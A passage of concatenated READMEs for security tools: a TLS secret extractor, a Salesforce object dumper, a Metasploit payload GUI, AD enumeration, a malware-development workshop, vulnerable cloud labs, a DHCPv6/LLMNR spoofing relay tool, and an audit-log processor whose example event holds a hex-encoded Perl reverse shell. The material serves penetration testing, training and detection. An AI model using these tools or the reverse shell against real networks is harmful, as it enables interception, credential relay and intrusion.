collectArtifacts specifies whether to collect the file artifacts that would normally be collected by the module. If false, all artifacts will be omitted for that module. This may be needed in cases where storage space is a consideration, and the collected artifacts are large, or in cases where the collected artifacts may represent a privacy issue for the user whose system is being analyzed.

Writing your own modules

Modules must consist of a file containing a class that is subclassed from Collector (defined in collectors/collector.py), and they must be placed in the collectors folder. A new Collector module can be easily created by duplicating the collectors/template.py file and customizing it for your own use.

def __init__(self, collectionPath, allUsers)

This method can be overridden if necessary, but the super Collector.init() must be called in such a case, preferably before your custom code executes. This gives the object the chance to get its properties set up before your code tries to use them.

def printStartInfo(self)

This is a very simple method that will be called when this module's collection begins. Its intent is to print a message to stdout to give the user a sense of progress, by providing feedback about what is happening.

def applySettings(self, settingsDict)

This gives the module the chance to apply any custom settings. Each module can have its own self-defined settings, but the settingsDict should also be passed to the super, so that the Collection class can handle any settings that it defines.

def collect(self)

This method is the core of the module. This is called when it is time for the module to begin collection. It can write as many files as it needs to, but should confine this activity to files within the path self.collectionPath, and should use filenames that are not already taken by other modules.

If you wish to collect artifacts, don't try to do this on your own. Simply add paths to the self.pathsToCollect array, and the Collector class will take care of copying those into the appropriate subpaths in the artifacts folder, and maintaining the metadata (permissions, extended attributes, flags, etc) on the artifacts.

When the method finishes, be sure to call the super (Collector.collect(self)) to give the Collector class the chance to handle its responsibilities, such as collecting artifacts.

Your collect method can use any data collected in the basic_info.txt or lsregister.txt files found at self.collectionPath. These are collected at the beginning by the pict.py script, and can be assumed to be available for use by any other modules. However, you should not rely on output from any other modules, as there is no guarantee that the files will be available when your module runs. Modules may not run in the order they appear in your configuration JSON, since Python dictionaries are unordered.

Credits

Thanks to Greg Neagle for FoundationPlist.py, which solved lots of problems with reading binary plists, plists containing date data types, etc.



Peetch - An eBPF Playground


peetch is a collection of tools aimed at experimenting with different aspects of eBPF to bypass TLS protocol protections.

Currently, peetch includes two subcommands. The first called dump aims to sniff network traffic by associating information about the source process with each packet. The second called tls allows to identify processes using OpenSSL to extract cryptographic keys.

Combined, these two commands make it possible to decrypt TLS exchanges recorded in the PCAPng format.


Installation

peetch relies on several dependencies including non-merged modifications of bcc and Scapy. A Docker image can be easily built in order to easily test peetch using the following command:

docker build -t quarkslab/peetch .

Commands Walk Through

The following examples assume that you used the following command to enter the Docker image and launch examples within it:

docker run --privileged --network host --mount type=bind,source=/sys,target=/sys --mount type=bind,source=/proc,target=/proc --rm -it quarkslab/peetch

dump

This sub-command gives you the ability to sniff packets using an eBPF TC classifier and to retrieve the corresponding PID and process names with:

peetch dump
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https S / Padding
curl/1289291 - Ether / IP / TCP 208.97.177.124:https > 10.211.55.10:53052 SA / Padding
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https A / Padding
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https PA / Raw / Padding
curl/1289291 - Ether / IP / TCP 208.97.177.124:https > 10.211.55.10:53052 A / Padding

Note that for demonstration purposes, dump will only capture IPv4 based TCP segments.

For convenience, the captured packets can be store to PCAPng along with process information using --write:

peetch dump --write peetch.pcapng
^C

This PCAPng can easily be manipulated with Wireshark or Scapy:

scapy
>>> l = rdpcap("peetch.pcapng")
>>> l[0]
<Ether dst=00:1c:42:00:00:18 src=00:1c:42:54:f3:34 type=IPv4 |<IP version=4 ihl=5 tos=0x0 len=60 id=11088 flags=DF frag=0 ttl=64 proto=tcp chksum=0x4bb1 src=10.211.55.10 dst=208.97.177.124 |<TCP sport=53054 dport=https seq=631406526 ack=0 dataofs=10 reserved=0 flags=S window=64240 chksum=0xc3e9 urgptr=0 options=[('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1272423534, 0)), ('NOP', None), ('WScale', 7)] |<Padding load='\x00\x00' |>>>>
>>> l[0].comment
b'curl/1289909'

tls

This sub-command aims at identifying process that uses OpenSSl and makes it is to dump several things like plaintext and secrets.

By default, peetch tls will only display one line per process, the --directions argument makes it possible to display the exchanges messages:

peetch tls --directions
<- curl (1291078) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256
> curl (1291078) 208.97.177.124/443 TLS1.-1 ECDHE-RSA-AES128-GCM-SHA256

Displaying OpenSSL buffer content is achieved with --content.

peetch tls --content
<- curl (1290608) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256

0000 47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A GET / HTTP/1.1..
0010 48 6F 73 74 3A 20 77 77 77 2E 70 65 72 64 75 2E Host: www.perdu.
0020 63 6F 6D 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A com..User-Agent:
0030 20 63 75 72 6C 2F 37 2E 36 38 2E 30 0D 0A 41 63 curl/7.68.0..Ac

-> curl (1290608) 208.97.177.124/443 TLS1.-1 ECDHE-RSA-AES128-GCM-SHA256

0000 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK.
0010 0A 44 61 74 65 3A 20 54 68 75 2C 20 31 39 20 4D .Date: Thu, 19 M
0020 61 79 20 32 30 32 32 20 31 38 3A 31 36 3A 30 31 ay 2022 18:16:01
0030 20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70 GMT..Server: Ap

The --secrets arguments will display TLS Master Secrets extracted from memory. The following example leverages --write to write master secrets to discuss to simplify decruypting TLS messages with Scapy:

$ (sleep 5; curl https://www.perdu.com/?name=highly%20secret%20information --tls-max 1.2 -http1.1) &

# peetch tls --write &
curl (1293232) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256

# peetch dump --write traffic.pcapng
^C

# Add the master secret to a PCAPng file
$ editcap --inject-secrets tls,1293232-master_secret.log traffic.pcapng traffic-ms.pcapng

$ scapy
>>> load_layer("tls")
>>> conf.tls_session_enable = True
>>> l = rdpcap("traffic-ms.pcapng")
>>> l[13][TLS].msg
[<TLSApplicationData data='GET /?name=highly%20secret%20information HTTP/1.1\r\nHost: www.perdu.com\r\nUser-Agent: curl/7.68.0\r\nAccept: */*\r\n\r\n' |>]

Limitations

By design, peetch only supports OpenSSL and TLS 1.2.



Cirrusgo - A Fast Tool To Scan SAAS, PAAS App Written In Go


A fast tool to scan SAAS,PAAS App written in Go

SAAS App Support :

  • salesforce
  • contentful (next version)

Note flag -o output not working

install : golang 1.18Ver

go install -v github.com/Ph33rr/cirrusgo/cmd/cirrusgo@latest
or
go install -v github.com/Ph33rr/CirrusGo/cmd/cirrusgo@latest


Help:

cirrusgo --help
  ______ _                           ______
/ ____/(_)_____ _____ __ __ _____ / ____/____
/ / / // ___// ___// / / // ___// / __ / __ \
/ /___ / // / / / / /_/ /(__ )/ /_/ // /_/ /
\____//_//_/ /_/ \__,_//____/ \____/ \____/ v0.0.1

cirrusgo --help

-u, --url <URL> Define single URL to fuzz
-l, --list Show App List
-c, --check only check endpoint
-V, --version Show current version
-h, --help Display its help

[cirrusgo [app] [options] ..]
cirrusgo salesforce --help

-u, --url <URL> Define single URL
-c, --check only check endpoint
-lobj, --listobj pull the object list.
-gobj --getobj pull the object.
-obj --objects set the object name. Default value is "User" object.
Juicy Objects: Case,Account,User,Contact,Document,Cont
entDocument,ContentVersion,ContentBody,CaseComment,Not
e,Employee,Attachment,EmailMessage,CaseExternalDocumen
t,Attachment,Lead,Name,EmailTemplate,EmailMessageRelation
-gre --getrecord pull the Record id.
-re --recordid set the recode id to dump the record
-cw --chkWritable check all Writable objects
-f, --full dump all pages of objects.
--dump
-H, --header <HEADER> Pass custom header to target
-proxy, --proxy <URL> Use proxy to fuzz

-o, --output <FILE> File to save results

[flags payload]
[command: cirrusgo salesforce --payload options]
-payload, --payload Generator payload for test manual Default "ObjectList"

GetItems -obj set object
-page set page
-pages set pageSize
GetRecord -re set recoder id
WritableOBJ -obj set object
SearchObj -obj set object
-page set page
-pages set pageSize
AuraContext -fwuid set UID
-App set AppName
-markup set markup
ObjectList no options
Dump no options
-h, --help Display its help

Example :

cirrusgo salesforce -u https://loclhost -gobj

dump:

cirrusgo salesforce -u https://localhost/ -f

check Writable Objects:

cirusgo salesforce -u https://localhost/ -cw



Kage - Graphical User Interface For Metasploit Meterpreter And Session Handler


Kage (ka-geh) is a tool inspired by AhMyth designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads.
For now it only supports windows/meterpreter & android/meterpreter.


Getting Started

Please follow these instructions to get a copy of Kage running on your local machine without any problems.

Prerequisites

Installing

You can install Kage binaries from here.

for developers

to run the app from source code:

# Download source code
git clone https://github.com/WayzDev/Kage.git

# Install dependencies and run kage
cd Kage
yarn # or npm install
yarn run dev # or npm run dev

# to build project
yarn run build

electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.

For Generating APK Payload select Raw format in dropdown list.

Screenshots







Disclaimer

I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.

Twitter: @iFalah

Email: ifalah@protonmail.com

Credits

Metasploit Framework - (c) Rapid7 Inc. 2012 (BSD License)
http://www.metasploit.com/

node-msfrpc - (c) Tomas Gonzalez Vivo. 2017 (Apache License)
https://github.com/tomasgvivo/node-msfrpc

electron-vue - (c) Greg Holguin. 2016 (MIT)
https://github.com/SimulatedGREG/electron-vue


This project was generated with electron-vue using vue-cli. Documentation about the original structure can be found here.



SilentHound - Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.


Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.


Installation

Using pipenv (recommended method)

sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd silenthound
pipenv install

This will create an isolated virtual environment with dependencies needed for the project. To use the project you can either open a shell in the virtualenv with pipenv shell or run commands directly with pipenv run.

From requirements.txt (legacy)

This method is not recommended because python-ldap can cause many dependency errors.

Install dependencies with pip:

python3 -m pip install -r requirements.txt
python3 silenthound.py -h

Usage

$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain

Quietly enumerate an Active Directory environment.

positional arguments:
TARGET Domain Controller IP
domain Dot (.) separated Domain name including both contexts e.g. ACME.com / HOME.local / htb.net

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
LDAP username - not the same as user principal name. E.g. Username: bob.dole might be 'bob
dole'
-p PASSWORD, --password PASSWORD
LDAP passwo rd - use single quotes 'password'
-o OUTPUT, --output OUTPUT
Name for output files. Creates output files for hosts, users, domain admins, and descriptions
in the current working directory.
-g, --groups Display Group names with user members.
-n, --org-unit Display Organizational Units.
-k, --keywords Search for key words in LDAP objects.

About

A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a Lay of the Land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed it will attempt anonymous BIND.

Using the -o flag will result in output files for each section normally in stdout. The files created using all flags will be:

-rw-r--r--  1 kali  kali   122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r-- 1 kali kali 60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r-- 1 kali kali 2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r-- 1 kali kali 89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r-- 1 kali kali 1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r-- 1 kali kali 66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r-- 1 kali kali 529 Jun 30 11:37 BASENAME-users.txt

Author

Roadmap

  • Parse users belonging to specific OUs
  • Refine output
  • Continuously cleanup code
  • Move towards OOP

For additional feature requests please submit an issue and add the enhancement tag.



PR-DNSd - Passive-Recursive DNS Daemon


Passive-Recursive DNS daemon.


Quickstart

nameserver 127.0.0.1 | sudo tee /etc/resolv.conf dig google.com dig -x $(dig +short google.com)">
go get github.com/korc/PR-DNSd
sudo setcap cap_net_bind_service,cap_sys_chroot=ep go/bin/PR-DNSd
go/bin/PR-DNSd -upstream 9.9.9.9:53 -listen 127.0.0.1:53
echo nameserver 127.0.0.1 | sudo tee /etc/resolv.conf
dig google.com
dig -x $(dig +short google.com)

If you can't use setcap, you have to use -chroot "" and -listen :<high_port> options, or run as root.

Use cases

  • run as local host DNS service, to fix your netstat/tcpview/lsof etc. output
  • as enterprise-internal DNS server, to also be able to do meaningful EDR/IR and log analysis
  • as cloud service, to also collect Passive DNS data from non-enterprise (home, BYOD etc.) devices
    • hint: you probably want to configure DDoS protection options
  • in cloud as DNS-over-TLS server, to additionally provide private DNS for supporting devices (ex: Android 9's private DNS setting)
    • ex: domain pattern based firewall/proxy configuration for mobile devices

Running as your own private server for Android9's Private DNS settings

After appropriate setcap, run:

PR-DNSd -tlslisten :853 -cert YOUR_SERVER_CRT_KEY_PEM -upstream 1.1.1.1:53 -store pr-dnsd

Options

-cert string
TCP-TLS listener certificate (required for tls listener)
-chroot string
chroot to directory after start (default "/var/tmp")
-count int
Count of replies allowed before debounce delay is applied (default 100)
-ctmout string
Client timeout for upstream queries
-debounce string
Required time duration between UDP replies to single IP to prevent DoS (default "200ms")
-key string
TCP-TLS certificate key (default same as -cert value)
-listen string
listen address (default ":53")
-silent
Don't report normal data
-store string
Store PTR data to specified file
-tlslisten string
TCP-TLS listener address (default ":853")
-upstream string
upstream DNS serv er (tcp-tls:// prefix for DoT) (default "1.1.1.1:53")
(with tls and chroot, ensure ca-certificates and resolv.conf in chroot are properly set up)


Maldev-For-Dummies - A Workshop About Malware Development


In the age of EDR, red team operators cannot get away with using pre-compiled payloads anymore. As such, malware development is becoming a vital skill for any operator. Getting started with maldev may seem daunting, but is actually very easy. This workshop will show you all you need to get started!

This repository contains the slides and accompanying exercises for the 'MalDev for Dummies' workshop that will be facilitated at Hack in Paris 2022 (additional conferences TBA). The exercises will remain available here to be completed at your own pace - the learning process should never be rushed! Issues and pull requests to this repo with questions and/or suggestions are welcomed.

Disclaimer: Malware development is a skill that can -and should- be used for good, to further the field of (offensive) security and keep our defenses sharp. If you ever use this skillset to perform activities that you have no authorization for, you are a bigger dummy than this workshop is intended for and you should skidaddle on out of here.

 

Workshop Description

With antivirus (AV) and Enterprise Detection and Response (EDR) tooling becoming more mature by the minute, the red team is being forced to stay ahead of the curve. Gone are the times of execute-assembly and dropping unmodified payloads on disk - if you want your engagements to last longer than a week you will have to step up your payload creation and malware development game. Starting out in this field can be daunting however, and finding the right resources is not always easy.

This workshop is aimed at beginners in the space and will guide you through your first steps as a malware developer. It is aimed primarily at offensive practitioners, but defensive practitioners are also very welcome to attend and broaden their skillset.

During the workshop we will go over some theory, after which we will set you up with a lab environment. There will be various exercises that you can complete depending on your current skillset and level of comfort with the subject. However, the aim of the workshop is to learn, and explicitly not to complete all the exercises. You are free to choose your preferred programming language for malware development, but support during the workshop is provided primarily for the C# and Nim programming languages.

During the workshop, we will discuss the key topics required to get started with building your own malware. This includes (but is not limited to):

  • The Windows API
  • Filetypes and execution methods
  • Shellcode execution and injection
  • AV and EDR evasion methods

Getting Started

To get started with malware development, you will need a dev machine so that you are not bothered by any defensive tooling that may run on your host machine. I prefer Windows for development, but Linux or MacOS will do just as fine. Install your IDE of choice (I use VS Code for almost everything except C#, for which I use Visual Studio, and then install the toolchains required for your MalDev language of choice:

  • C#: Visual Studio will give you the option to include the .NET packages you will need to develop C#. If you want to develop without Visual Studio, you can download the .NET Framework separately.
  • Nim lang: Follow the download instructions. Choosenim is a convenient utility that can be used to automate the installation process.
  • Golang (not supported during workshop):Follow the download instructions.
  • Rust (not supported during workshop): Rustup can be used to install Rust along with the required toolchains.

Don't forget to disable Windows Defender or add the appropriate exclusions, so your hard work doesn't get quarantined!

Note: Oftentimes, package managers such as apt or software management tools such as Chocolatey can be used to automate the installation and management of dependencies in a convenient and repeatable way. Be conscious however that versions in package managers are often behind on the real thing! Below is an example Chocolatey command to install the mentioned tooling all at once.
 choco install -y nim choosenim go rust vscode visualstudio2019community dotnetfx

Compiling programs

Both C# and Nim are compiled languages, meaning that a compiler is used to translate your source code into binary executables of your chosen format. The process of compilation differs per language.

C#

C# code (.cs files) can either be compiled directly (with the csc utility) or via Visual Studio itself. Most source code in this repo (except the solution to bonus exercise 3) can be compiled as follows.

Note: Make sure you run the below command in a "Visual Studio Developer Command Prompt" so it knows where to find csc, it is recommended to use the "x64 Native Tools Command Prompt" for your version of Visual Studio.
csc filename.exe /unsafe

You can enable compile-time optimizations with the /optimize flag. You can hide the console window by adding /target:winexe as well, or compile as DLL with /target:library (but make sure your code structure is suitable for this).

Nim

Nim code (.nim files) is compiled with the nim c command. The source code in this repo can be compiled as follows.

nim c filename.nim

If you want to optimize your build for size and strip debug information (much better for opsec!), you can add the following flags.

nim c -d:release -d:strip --opt:size filename.nim

Optionally you can hide the console window by adding --app:gui as well.

Dependencies

Nim

Most Nim programs depend on a library called "Winim" to interface with the Windows API. You can install the library with the Nimble package manager as follows (after installing Nim):

nimble install winim

Resources

The workshop slides reference some resources that you can use to get started. Additional resources are listed in the README.md files for every exercise!



TerraformGoat - "Vulnerable By Design" Multi Cloud Deployment Tool


TerraformGoat is selefra research lab's "Vulnerable by Design" multi cloud deployment tool.

Currently supported cloud vendors include Alibaba Cloud, Tencent Cloud, Huawei Cloud, Amazon Web Services, Google Cloud Platform, Microsoft Azure.


Scenarios

ID Cloud Service Company Types Of Cloud Services Vulnerable Environment
1 Alibaba Cloud Networking VPC Security Group Open All Ports
2 Alibaba Cloud Networking VPC Security Group Open Common Ports
3 Alibaba Cloud Object Storage Bucket HTTP Enable
4 Alibaba Cloud Object Storage Object ACL Writable
5 Alibaba Cloud Object Storage Object ACL Readable
6 Alibaba Cloud Object Storage Special Bucket Policy
7 Alibaba Cloud Object Storage Bucket Public Access
8 Alibaba Cloud Object Storage Object Public Access
9 Alibaba Cloud Object Storage Bucket Logging Disable
10 Alibaba Cloud Object Storage Bucket Policy Readable
11 Alibaba Cloud Object Storage Bucket Object Traversal
12 Alibaba Cloud Object Storage Unrestricted File Upload
13 Alibaba Cloud Object Storage Server Side Encryption No KMS Set
14 Alibaba Cloud Object Storage Server Side Encryption Not Using BYOK
15 Alibaba Cloud Elastic Computing Service ECS SSRF
16 Alibaba Cloud Elastic Computing Service ECS Unattached Disks Are Unencrypted
17 Alibaba Cloud Elastic Computing Service ECS Virtual Machine Disks Are Unencrypted
18 Tencent Cloud Networking VPC Security Group Open All Ports
19 Tencent Cloud Networking VPC Security Group Open Common Ports
20 Tencent Cloud Object Storage Bucket ACL Writable
21 Tencent Cloud Object Storage Bucket ACL Readable
22 Tencent Cloud Object Storage Bucket Public Access
23 Tencent Cloud Object Storage Object Public Access
24 Tencent Cloud Object Storage Unrestricted File Upload
25 Tencent Cloud Object Storage Bucket Object Traversal
26 Tencent Cloud Object Storage Bucket Logging Disable
27 Tencent Cloud Object Storage Server Side Encryption Disable
28 Tencent Cloud Elastic Computing Service CVM SSRF
29 Tencent Cloud Elastic Computing Service CBS Storage Are Not Used
30 Tencent Cloud Elastic Computing Service CVM Virtual Machine Disks Are Unencrypted
31 Huawei Cloud Networking ECS Unsafe Security Group
32 Huawei Cloud Object Storage Object ACL Writable
33 Huawei Cloud Object Storage Special Bucket Policy
34 Huawei Cloud Object Storage Unrestricted File Upload
35 Huawei Cloud Object Storage Bucket Object Traversal
36 Huawei Cloud Object Storage Wrong Policy Causes Arbitrary File Uploads
37 Huawei Cloud Elastic Computing Service ECS SSRF
38 Huawei Cloud Relational Database Service RDS Mysql Baseline Checking Environment
39 Amazon Web Services Networking VPC Security Group Open All Ports
40 Amazon Web Services Networking VPC Security Group Open Common Ports
41 Amazon Web Services Object Storage Object ACL Writable
42 Amazon Web Services Object Storage Bucket ACL Writable
43 Amazon Web Services Object Storage Bucket ACL Readable
44 Amazon Web Services Object Storage MFA Delete Is Disable
45 Amazon Web Services Object Storage Special Bucket Policy
46 Amazon Web Services Object Storage Bucket Object Traversal
47 Amazon Web Services Object Storage Unrestricted File Upload
48 Amazon Web Services Object Storage Bucket Logging Disable
49 Amazon Web Services Object Storage Bucket Allow HTTP Access
50 Amazon Web Services Object Storage Bucket Default Encryption Disable
51 Amazon Web Services Elastic Computing Service EC2 SSRF
52 Amazon Web Services Elastic Computing Service Console Takeover
53 Amazon Web Services Elastic Computing Service EBS Volumes Are Not Used
54 Amazon Web Services Elastic Computing Service EBS Volumes Encryption Is Disabled
55 Amazon Web Services Elastic Computing Service Snapshots Of EBS Volumes Are Unencrypted
56 Amazon Web Services Identity and Access Management IAM Privilege Escalation
57 Google Cloud Platform Object Storage Object ACL Writable
58 Google Cloud Platform Object Storage Bucket ACL Writable
59 Google Cloud Platform Object Storage Bucket Object Traversal
60 Google Cloud Platform Object Storage Unrestricted File Upload
61 Google Cloud Platform Elastic Computing Service VM Command Execution
62 Microsoft Azure Object Storage Blob Public Access
63 Microsoft Azure Object Storage Container Blob Traversal
64 Microsoft Azure Elastic Computing Service VM Command Execution


Install

TerraformGoat is deployed using Docker images and therefore requires Docker Engine environment support, Docker Engine installation can be found in https://docs.docker.com/engine/install/

Depending on the cloud service provider you are using, choose the corresponding installation command.

Alibaba Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker run -itd --name terraformgoat_aliyun_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker exec -it terraformgoat_aliyun_0.0.4 /bin/bash

Tencent Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.4
docker run -itd --name terraformgoat_tencentcloud_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.4
docker exec -it terraformgoat_tencentcloud_0.0.4 /bin/bash

Huawei Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_huaweicloud:0.0.4
docker run -itd --name terraformgoat_huaweicloud_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_huaweicloud:0.0.4
docker exec -it terraformgoat_huaweicloud_0.0.4 /bin/bash

Amazon Web Services

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aws:0.0.4
docker run -itd --name terraformgoat_aws_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aws:0.0.4
docker exec -it terraformgoat_aws_0.0.4 /bin/bash

Google Cloud Platform

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_gcp:0.0.4
docker run -itd --name terraformgoat_gcp_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_gcp:0.0.4
docker exec -it terraformgoat_gcp_0.0.4 /bin/bash

Microsoft Azure

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_azure:0.0.4
docker run -itd --name terraformgoat_azure_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_azure:0.0.4
docker exec -it terraformgoat_azure_0.0.4 /bin/bash


Demo

After entering the container, cd to the corresponding scenario directory and you can start deploying the scenario.

Here is a demonstration of the Alibaba Cloud Bucket Object Traversal scenario build.

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker run -itd --name terraformgoat_aliyun_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker exec -it terraformgoat_aliyun_0.0.4 /bin/bash


 

cd /TerraformGoat/aliyun/oss/bucket_object_traversal/
aliyun configure
terraform init
terraform apply



The program prompts Enter a value:, type yes and enter, use curl to access the bucket, you can see the object traversed.



To avoid the cloud service from continuing to incur charges, remember to destroy the scenario in time after using it.

terraform destroy

Uninstall

If you are in a container, first execute the exit command to exit the container, and then execute the following command under the host.

docker stop $(docker ps -a -q -f "name=terraformgoat*")
docker rm $(docker ps -a -q -f "name=terraformgoat*")
docker rmi $(docker images -a -q -f "reference=registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat*")

Notice

  1. The README of each vulnerable environment is executed within the TerraformGoat container environment, so the TerraformGoat container environment needs to be deployed first.
  2. Due to the horizontal risk of intranet horizontal on the cloud in some scenarios, it is strongly recommended that users use their own test accounts to configure the scenarios, avoid using the cloud account of the production environment, and install TerraformGoat using Dockerfile to isolate the user's local cloud vendor token and the test account token.
  3. TerraformGoat is used for educational purposes only, It is not allowed to use it for illegal and criminal purposes, any consequences arising from TerraformGoat are the responsibility of the person using it, and not the selefra organization.


Contributing

Contributions are welcomed and greatly appreciated. Further reading — CONTRIBUTING.md for details on contribution workflow.

License

TerraformGoat is under the Apache 2.0 license. See the LICENSE file for details.



Pretender - Your MitM Sidekick For Relaying Attacks Featuring DHCPv6 DNS Takeover As Well As mDNS, LLMNR And NetBIOS-NS Spoofing


Your MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover
as well as mDNS, LLMNR and NetBIOS-NS spoofing


pretender is a tool developed by RedTeam Pentesting to obtain machine-in-the-middle positions via spoofed local name resolution and DHCPv6 DNS takeover attacks. pretender primarily targets Windows hosts, as it is intended to be used for relaying attacks but can be deployed on Linux, Windows and all other platforms Go supports. Name resolution queries can be answered with arbitrary IPs for situations where the relaying tool runs on a different host than pretender. It is designed to work with tools such as Impacket's ntlmrelayx.py and krbrelayx that handle the incoming connections for relaying attacks or hash dumping.

Read our blog post for more information about DHCPv6 DNS takeover, local name resolution spoofing and relay attacks.


Usage

To get a feel for the situation in the local network, pretender can be started in --dry mode where it only logs incoming queries and does not answer any of them:

pretender -i eth0 --dry
pretender -i eth0 --dry --no-ra # without router advertisements

To perform local name resolution spoofing via mDNS, LLMNR and NetBIOS-NS as well as a DHCPv6 DNS takeover with router advertisements, simply run pretender like this:

pretender -i eth0

You can disable certain attacks with --no-dhcp-dns (disabled DHCPv6, DNS and router advertisements), --no-lnr (disabled mDNS, LLMNR and NetBIOS-NS), --no-mdns, --no-llmnr, --no-netbios and --no-ra.

If ntlmrelayx.py runs on a different host (say 10.0.0.10/fe80::5), run pretender like this:

pretender -i eth0 -4 10.0.0.10 -6 fe80::5

Pretender can be setup to only respond to queries for certain domains (or all but certain domains) and it can perform the spoofing attacks only for certain hosts (or all but certain hosts). Referencing hosts by hostname relies on the name resolution of the host that runs pretender. See the following example:

pretender -i eth0 --spoof example.com --dont-spoof-for 10.0.0.3,host1.corp,fe80::f --ignore-nofqdn

For more information, run pretender --help.


Tips

  • Make sure to enable IPv6 support in ntlmrelayx.py with the -6 flag
  • Pretender can be configured to stop after a certain time period for situations where it cannot be aborted manually (--stop-after and main.vendorStopAfter)
  • Host info lookup (which relies on the ARP table, IP neighbours and reverse lookups) can be disabled with --no-host-info or main.vendorNoHostInfo
  • If you are not sure which interface to choose (especially on Windows), list all interfaces with names and addresses using --interfaces
  • If you want to exclude hosts from local name resolution spoofing, make sure to also exclude their IPv6 addresses or use --no-ipv6-lnr/main.vendorNoIPv6LNR
  • DHCPv6 messages usually contain a FQDN option (which can also sometimes contain a hostname which is not a FQDN). This option is used to filter out messages by hostname (--spoof-for/--dont-spoof-for). You can decide what to do with DHCPv6 messages without FQDN option by setting or omitting --ignore-nofqdn
  • Depending on the build configuration, either the operating system resolver (CGO_ENABLED=1) or a Go implementation (CGO_ENABLED=0) is used. This can be important for host info collection because the OS resolver may support local name resolution and the Go implementation does not, unless a stub resolver is used.
  • The host info functionality is currently only available for Windows and Linux.
  • A custom MAC address vendor list can be compiled into the binary by replacing the default list hostinfo/mac-vendors.txt. Only lines with MAC prefixes in the following format are recognized: FF:FF:FF<tab>VendorID<tab>Vendor (the MAC prefix length can be arbitrary).
  • If you only want to perform Kerberos relaying you can specify --no-lnr and --spoof-types SOA to ignore any queries that are unrelated to the attack.
  • When conducting a Kerberos relay attack where krbrelayx.py runs on a different host than pretender (relay IPv4 address points to different host that runs krbrelayx.py), the host running krbrelayx.py will also need to run pretender in order to receive and deny the Dynamic Update query sent to the relay IPv4 address.

Building and Vendoring

Pretender can be build as follows:

go build

Pretender can also be compiled with pre-configured settings. For this, the ldflags have to be modified like this:

-ldflags '-X main.vendorInterface=eth1'

For example, Pretender can be built for Windows with a specific default interface, without colored output and with a relay IPv4 address configured:

GOOS=windows go build -trimpath -ldflags '-X "main.vendorInterface=Ethernet 2" -X main.vendorNoColor=true -X main.vendorRelayIPv4=10.0.0.10'

Full list of vendoring options (see defaults.go or pretender --help for detailed information):

vendorInterface
vendorRelayIPv4
vendorRelayIPv6
vendorSOAHostname
vendorNoDHCPv6DNSTakeover
vendorNoDHCPv6
vendorNoDNS
vendorNoMDNS
vendorNoNetBIOS
vendorNoLLMNR
vendorNoLocalNameResolution
vendorNoRA
vendorNoIPv6LNR
vendorSpoof
vendorDontSpoof
vendorSpoofFor
vendorDontSpoofFor
vendorSpoofTypes
vendorIgnoreDHCPv6NoFQDN
vendorDryMode
vendorTTL
vendorLeaseLifetime
vendorRARouterLifetime
vendorRAPeriod
vendorStopAfter
vendorVerbose
vendorNoColor
vendorNoTimestamps
vendorLogFileName
vendorNoHostInfo
vendorHideIgnored
vendorRedirectStderr
vendorListInterfaces


Laurel - Transform Linux Audit Logs For SIEM Usage


LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.


Why?

TLDR: Instead of audit events that look like this…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:

